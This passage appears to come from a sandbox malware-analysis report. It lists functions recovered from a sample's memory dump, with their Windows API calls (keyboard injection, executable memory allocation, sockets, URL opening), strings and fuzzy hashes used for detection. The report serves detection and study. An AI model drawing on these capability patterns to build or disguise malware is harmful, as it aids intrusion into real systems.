Instruction ID: 5a742cd0d7b62c1a897d5e58207799aa000fa1b187e9bd1b2ef80362b05ac27e
Opcode Fuzzy Hash: a613039fe1793df3146268855a9e346770a9986fa07c9b1ae78c0c7ca6e6ade5
Instruction Fuzzy Hash: 89D0E230521B12CFD730AB75D948606BAE6AF09352F12883A9886D6660EAB0D8808A51

Function 005D4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005D4B83,?), ref: 005D4C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005D4C56

Strings

kernel32.dll, xrefs: 005D4C3F
Wow64RevertWow64FsRedirection, xrefs: 005D4C50

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: e3df3095f63b92be67bdd64b9e7dbe2e09704b96b1595bf56d8edbe16be1f9c5
Instruction ID: fb4b37818cb36f93ebd5a31b95b54d1f13cd3ceffd87efca510f4dd0d5c77c6d
Opcode Fuzzy Hash: e3df3095f63b92be67bdd64b9e7dbe2e09704b96b1595bf56d8edbe16be1f9c5
Instruction Fuzzy Hash: D0D01770520B13CFD730AF35D90860A7BE6AF05352F12883B9896D6A70EA70D880CA51

Function 00650DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00651039), ref: 00650DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00650E07

Strings

RegDeleteKeyExW, xrefs: 00650E01
advapi32.dll, xrefs: 00650DF0

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: a651f3d78acf0c964f05197ca1685f8bb2b993adb70760c904a6f96929cf3e36
Instruction ID: 605507d2fff9ac6743ec76cb8076a22b76f4110ada3b95287d8fe249c5359127
Opcode Fuzzy Hash: a651f3d78acf0c964f05197ca1685f8bb2b993adb70760c904a6f96929cf3e36
Instruction Fuzzy Hash: 71D01770510B22CFE721AF75D80969676E7AF04353F269C3E9886D2250EBB0D894CB61

Function 006490E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00648CF4,?,0065F910), ref: 006490EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00649100

Strings

kernel32.dll, xrefs: 006490E9
GetModuleHandleExW, xrefs: 006490FA

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 4ba91115c26ea5c7789699a8090b8a8895e6076ea09e29963f9e22782e35f042
Instruction ID: 515e7b87a6ad8f8a4c04ed629322fe05e0c7f8bcddbb4d78643910971ee48fab
Opcode Fuzzy Hash: 4ba91115c26ea5c7789699a8090b8a8895e6076ea09e29963f9e22782e35f042
Instruction Fuzzy Hash: 0AD01734550B13CFDB30EF31D81864776E6AF06392F12883A9986D7A90EA70C880CBA0

Function 00611714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00611718
__swprintf.LIBCMT ref: 00611749

Strings

WIN_XPe, xrefs: 00611788
%.3d, xrefs: 00611723

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 79ae145e0ae56090eece5aded43e0fa51b698ac44eefd1be7472035a02f142a0
Instruction ID: aa5e50d80c384397e62139a6901101d441f0ab1aa8824a463c2d4fef101943af
Opcode Fuzzy Hash: 79ae145e0ae56090eece5aded43e0fa51b698ac44eefd1be7472035a02f142a0
Instruction Fuzzy Hash: D8D01271805109EAC7109790988C8F9777EB70A301F180553F702DA280E22587D5E621

Function 0062717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cda929890754b5181ffa193942b4ebf1c444d84d15fe857cac82a2788a394cba
Instruction ID: d360b8ea387a1b9032954fbd1095068d192c1f9658d0e689fce17668387f4022
Opcode Fuzzy Hash: cda929890754b5181ffa193942b4ebf1c444d84d15fe857cac82a2788a394cba
Instruction Fuzzy Hash: 75C14B74A04626EFCB14DF94D884EAEBBB6FF48714B148598E805DB251D730ED41DB90

Function 0064E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0064E0BE
CharLowerBuffW.USER32(?,?), ref: 0064E101

Part of subcall function 0064D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0064D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0064E301
_memmove.LIBCMT ref: 0064E314

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 4b7de7e70aa94268b2045486af029da937f638bfe8f3c3e93e4b6d28570928f3
Instruction ID: 2bf04935130115a44be214c0501207f35dc637a06b5757a405ebf21590229804
Opcode Fuzzy Hash: 4b7de7e70aa94268b2045486af029da937f638bfe8f3c3e93e4b6d28570928f3
Instruction Fuzzy Hash: 91C15571A083019FC754DF28C480A6ABBE5FF89714F04896EF899DB351D771EA46CB82

Function 00648093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006480C3
CoUninitialize.OLE32 ref: 006480CE

Part of subcall function 0062D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0062D5D4

VariantInit.OLEAUT32(?), ref: 006480D9
VariantClear.OLEAUT32(?), ref: 006483AA

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: c438e4b96d82bde4f63db6f44d26c0195faf49fe855c72ef13c50cfbccc223c6
Instruction ID: 18b40f2262a0484548d4485396f3380b3fe9300afdd02c52cf384f3387308cc7
Opcode Fuzzy Hash: c438e4b96d82bde4f63db6f44d26c0195faf49fe855c72ef13c50cfbccc223c6
Instruction Fuzzy Hash: 00A159756047029FCB10EF58C485A6EBBE6BF89714F04445EF9969B3A2CB34ED05CB82

Function 0062687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0062688E
SysAllocString.OLEAUT32(00000000), ref: 00626937
VariantCopy.OLEAUT32 ref: 00626966
VariantClear.OLEAUT32(?), ref: 0062698D

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 59ba9e549b1c77aa111ab1ceef095e25251dc4699aa7951fa6fb358a4a21d032
Instruction ID: adb24d74426544be42fd0a8b8ebc59182b26a850f2e07a9874a01a1b49438879
Opcode Fuzzy Hash: 59ba9e549b1c77aa111ab1ceef095e25251dc4699aa7951fa6fb358a4a21d032
Instruction Fuzzy Hash: 4551C474700B129ADB24AF65E8A567AB7E6AF44310F20D81FF586DB391DB34DC818F05

Function 006469AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 006469D1
WSAGetLastError.WSOCK32(00000000), ref: 006469E1

Part of subcall function 005D9837: __itow.LIBCMT ref: 005D9862
Part of subcall function 005D9837: __swprintf.LIBCMT ref: 005D98AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00646A45
WSAGetLastError.WSOCK32(00000000), ref: 00646A51

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 8540a14f8e2e3e3c958780d1485387072eb619ebb5f60085eca75415c760c48e
Instruction ID: b88cea8d3d4e065d37dc9296ddc545d1889f1457b86f5c1ffaf75a28e44a7a86
Opcode Fuzzy Hash: 8540a14f8e2e3e3c958780d1485387072eb619ebb5f60085eca75415c760c48e
Instruction Fuzzy Hash: BD41B4757402016FEB60BF28DC8AF797BA5AF45B14F04801AFA59AF3C2DA709D408791

Function 0064641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0065F910), ref: 006464A7
_strlen.LIBCMT ref: 006464D9

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: abaae12220af0524317078ff758092402c014867779e782cabf5e80855925352
Instruction ID: ed5f068b3eff14ef0ebabf13906b4bc1b291b5236a6d38675e411395313410cb
Opcode Fuzzy Hash: abaae12220af0524317078ff758092402c014867779e782cabf5e80855925352
Instruction Fuzzy Hash: 4341C671900105ABCB14FBA8DC99EFEBBAABF45310F14815AF91597392EB30AD04CB51

Function 0063B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0063B89E
GetLastError.KERNEL32(?,00000000), ref: 0063B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0063B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0063B915

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 7b6bb7b4af8fdd92c79e67e39704b30de8e792af7f204e451a3469893d0b53c1
Instruction ID: 4aa9962e9d1bfa834a7c6141097d956740dacfd6d14e703c09273e472d82fb36
Opcode Fuzzy Hash: 7b6bb7b4af8fdd92c79e67e39704b30de8e792af7f204e451a3469893d0b53c1
Instruction Fuzzy Hash: 45411135A00651DFCB21EF19C445A59BBE2FF8A710F15809AED4A9B361CB30FD01DB91

Function 00630AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00630B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00630B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00630BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00630BFB

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 587d03eb49971033e0c043e6b6b475a0e27b694edc96499652fad1ca8cde6280
Instruction ID: c1f5682edf1818acdd2b43285b16674e33fbe42c6720f7296c18166dd13858d2
Opcode Fuzzy Hash: 587d03eb49971033e0c043e6b6b475a0e27b694edc96499652fad1ca8cde6280
Instruction Fuzzy Hash: FB317A70D40718AEFF30CB298C25BFAFBABEB55315F04426AF482522D1C376898997D5

Function 00630C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00630C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00630C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00630CE1
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00630D33

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 6ececcde99590866ff5ca58ff24cd20e234f3317c2779d5013ed6ec2c3f833a9
Instruction ID: faff14778ebc0ae0e8318341678b259e26fd0314f80c622304958be6e2569150
Opcode Fuzzy Hash: 6ececcde99590866ff5ca58ff24cd20e234f3317c2779d5013ed6ec2c3f833a9
Instruction Fuzzy Hash: AD313370940718AEFF308B648C25BFEBBA7AF49321F04636AE481522D1D3759989C7E1

Function 006061C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006061FB
__isleadbyte_l.LIBCMT ref: 00606229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00606257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0060628D

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 11e5dfc98ed7baa1537e7655a4697a45f9ad3dbf885e2cf2938f244effeeef7d
Instruction ID: ebf006b607573e725991faab7182415847548b6830dcc918626fe337c60df9ed
Opcode Fuzzy Hash: 11e5dfc98ed7baa1537e7655a4697a45f9ad3dbf885e2cf2938f244effeeef7d
Instruction Fuzzy Hash: AB31CF30640246AFDF298F64CC48BBB7BAAFF41310F154068F824872E1E731DA60DB90

Function 00654EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00654F02

Part of subcall function 00633641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0063365B
Part of subcall function 00633641: GetCurrentThreadId.KERNEL32 ref: 00633662
Part of subcall function 00633641: AttachThreadInput.USER32(00000000,?,00635005), ref: 00633669

GetCaretPos.USER32(?), ref: 00654F13
ClientToScreen.USER32(00000000,?), ref: 00654F4E
GetForegroundWindow.USER32 ref: 00654F54

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 6339e9c9306ec74e293405ed1640e90310a49652cf88d05d024847df75e2df54
Instruction ID: 5cf13cf735a7cbe34c96517c4c2ca1cc757b096e165666634a1d6825413dde4c
Opcode Fuzzy Hash: 6339e9c9306ec74e293405ed1640e90310a49652cf88d05d024847df75e2df54
Instruction Fuzzy Hash: 9E311E71D00209AFDB10EFA9C8859EFBBFDEF99304F10406AE415E7341EA719E458BA1

Function 00628656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0062810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00628121
Part of subcall function 0062810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0062812B
Part of subcall function 0062810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0062813A
Part of subcall function 0062810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00628141
Part of subcall function 0062810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00628157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006286A3
_memcmp.LIBCMT ref: 006286C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 006286FC
HeapFree.KERNEL32(00000000), ref: 00628703

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: c5510cae2d438a5303f4db96f62f048f17f7cfbc7eaa918b17e870112e6cb705
Instruction ID: f86e2596abc352a422f2df6dcae2cb77b36a1aa7664e9c6de1e26a5daf7abbf0
Opcode Fuzzy Hash: c5510cae2d438a5303f4db96f62f048f17f7cfbc7eaa918b17e870112e6cb705
Instruction Fuzzy Hash: 10216831A02619EFDB10DFA4DD48BEEB7BAEB60315F148059E805A7240DB30AA05CF50

Function 005F098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 005F09AE

Part of subcall function 005D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00637896,?,?,00000000), ref: 005D5A2C
Part of subcall function 005D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00637896,?,?,00000000,?,?), ref: 005D5A50

_fprintf.LIBCMT ref: 005F09E5
OutputDebugStringW.KERNEL32(?), ref: 00625DBB

Part of subcall function 005F4AAA: _flsall.LIBCMT ref: 005F4AC3

__setmode.LIBCMT ref: 005F0A1A

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: ec89a454c1399cfa846300696a6f8b7f9e2ca2955ad623008be01fb6114a990b
Instruction ID: ecea298ea1a2086710c377abc50e14582cf1b5d6d946515276906d7167f805fa
Opcode Fuzzy Hash: ec89a454c1399cfa846300696a6f8b7f9e2ca2955ad623008be01fb6114a990b
Instruction Fuzzy Hash: 101108319046096FD714B7B89C4E9FE7F69BFC1310F140016F20597282FE2449425B95

Function 00641767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006417A3

Part of subcall function 0064182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0064184C
